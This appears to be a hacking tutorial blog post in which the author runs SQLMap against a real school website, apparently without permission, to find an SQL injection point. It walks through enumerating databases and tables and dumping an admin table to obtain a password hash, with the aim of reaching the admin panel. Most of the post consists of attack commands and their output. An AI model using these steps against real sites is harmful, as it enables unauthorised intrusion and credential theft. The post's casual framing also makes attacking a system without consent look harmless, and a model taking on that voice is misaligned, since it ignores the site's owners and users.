Hello Guys!
In this article, I will be introducing a powerful database takeover tool called SQLMap
Now let’s get straight to the point.


It is a tool designed to satisfy all your needs related to SQL Injection. It can detect and bypass WAF (Web Application Firewall), can detect database type (like MSSQL, Oracle, Postgresql, etc.) and version, it can perform a different kind of injections (like blind, error-based, time based, etc.), it supports proxy, multiple strings for faster enumeration, etc. etc. etc.
In simple words its the best Automatic SQLi Tool so far.
Just give it an injection point and it will do everything itself.
Excited? Me too man lets do this.

Spotting A Potential Injection Point

I was just checking the school website of my crush to see if there are any pictures of her.
Aaaand I found one and clicked on it but then accidentally looked at the address bar of my browser and I saw this:


Sorry, I can’t let you see the complete URL, and yeah this article is only Educational Purposes.
?id=46 this thing…different values of the id pull out different data from the database. And as we learned in our previous article if a webpage uses SQL Queries to generate results it may generate anything that a user *coughs* a hacker wants.
So Ummm here is my target webpage “******.**/udml/photo_gallery.php?id=6
” or you may call it an injection point (as a hacker can insert his own SQL Queries here)
Now let’s try to breach into the database with SQLMap,

Injecting With SQLMap

Lets open terminal and type:

sqlmap -u www.******.**/photo_gallery.php?id=6

Here sqlmap represents SQLmap, -u represents URL, and then www.******.**/photo_gallery.php?id=6 is the value of URL.
Ok so I entered this command and I have this:

[email protected]:~# sqlmap -u www.******.**photo_gallery.php?id=6
 ___ ___| |_____ ___ ___  {1.0-dev-nongit-201701080a89}
|_ -| . | |     | .'| . |
|___|_  |_|_|_|_|__,|  _|
      |_|           |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 15:41:50

[15:41:55] [INFO] testing connection to the target URL
[15:42:00] [INFO] checking if the target is protected by some kind of WAF/IPS/IDS
[15:42:01] [INFO] testing if the target URL is stable
[15:42:01] [INFO] target URL is stable
[15:42:01] [INFO] testing if GET parameter 'id' is dynamic
[15:42:02] [INFO] confirming that GET parameter 'id' is dynamic
[15:42:03] [INFO] GET parameter 'id' is dynamic
[15:42:04] [INFO] heuristic (basic) test shows that GET parameter 'id' might be injectable (possible DBMS: 'MySQL')
[15:42:04] [INFO] heuristic (XSS) test shows that GET parameter 'id' might be vulnerable to XSS attacks
[15:42:04] [INFO] testing for SQL injection on GET parameter 'id'
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads 
for the remaining tests? [Y/n]

So SQLMap checked if the URL exists, then it checked if it is protected by a WAF/IPS/IDS, then it checked if the parameter id is dynamic which means whether its value changes or not.
Then it told me that it is vulnerable to SQL Injection and it guessed the Database Management System too i.e. MySQL.
Now in the last line, it’s asking me if I want to do further tests but no, it has guessed the DBMS so we don’t need it to do that.
And have you noticed that Y is in uppercase (here [Y/n] when it asks to choose an option?
Well, the recommended option is always shown in uppercase and you should always enter that recommended option if you don’t know what you are doing.
So I entered Y and it began to check for the version of DBMS (a version of MySQL).
After a few minutes, I got this

GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N]

Gotcha! Now it is confirmed that its vulnerable to SQL Injection and now its time to breach into the databases and stop testing further (So I entered N)
Hmm so now we know SQL Injection is possible we can tell SQLMap to retrieve/enumerate/find Databases.
For this I will pass the following command to the terminal,

sqlmap -u www.******.**/photo_gallery.php?id=6 --dbs

Where –DBS tells SQLMap to retrieve databases.
This command got me here,

[15:56:33] [INFO] fetching database names
[15:56:38] [INFO] the SQL query used returns 2 entries
[15:56:38] [INFO] retrieved: information_schema
[15:56:40] [INFO] retrieved: udmlacin_db
available databases [2]:
[*] information_schema
[*] udmlacin_db

Hmm so there are two databases (denoted by the [*] symbol) so which one should we breach?
Well the first database we have is information_schema and this a database you are going to find in nearly every DBMS system. It stores read only information about the other databases.
So this is not the interesting stuff.
The next database is udmlacin_db which is probably the core database so we have to breach into it.
For that we will have to find the tables that are present in the database udmlacin_db and for that I will enter the following command in the terminal,

sqlmap -u www.******.**/photo_gallery.php?id=6 --tables -D udmlacin

Where -D defines the target database.
And this command will show all the tables present in the target database like this,

Database: udmlacin_db
[14 tables]
| admin                |
| careers              |
| download_categories  |
| downloads            |
| emailenq             |
| knowledge_categories |
| knowledges           |
| ks_relations         |
| news                 |
| notice_categories    |
| notices              |
| pg_category          |
| pg_images            |
| subscriptions        |

Hmmm now what? I don’t know, it depends on what kind of information you want from the database.
In my case, I am interested in the table named admin because it may contain credentials (username, password etc.) by which we can login into admin panel of the website and can make changes to the website.
Hmmm so we lets retrieve the columns present in the table admin.
For this I will enter,

sqlmap -u www.******.**/photo_gallery.php?id=6 --columns -D udmlacin_db -T admin

Where -T option is used to supply the target table name.
Aaaand SQLMap retrieves the columns,

Database: udmlacin_db
Table: admin
[3 columns]
| Column   | Type         |
| id       | int(11)      |
| pass     | varchar(255) |
| username | varchar(25)  |

Now let‘s dump this column to see what‘s inside of it
For this I will supply the following command,

sqlmap -u www.******.**/photo_gallery.php?id=6 --dump -D udmlacin_db -T admin

In know time I got the results,

| id | pass                             | username |
| 1  | 1FF98CA167D78C6821403E99625007FE | admin    |

Whoa!! That’s a strong password!!
Nope…Its a hash!
Well yeah it is the password but it is encrypted, so you need to crack the cash to know the real password.
We are going to talk about Encryption and Hashes soon but for now, I want you to get familiar with SQLMap.
Comment down if you don’t understand something.
Till then, keep reading, keep learning.

Also Read: MSSQL Injection Cheat sheet

Leave a Reply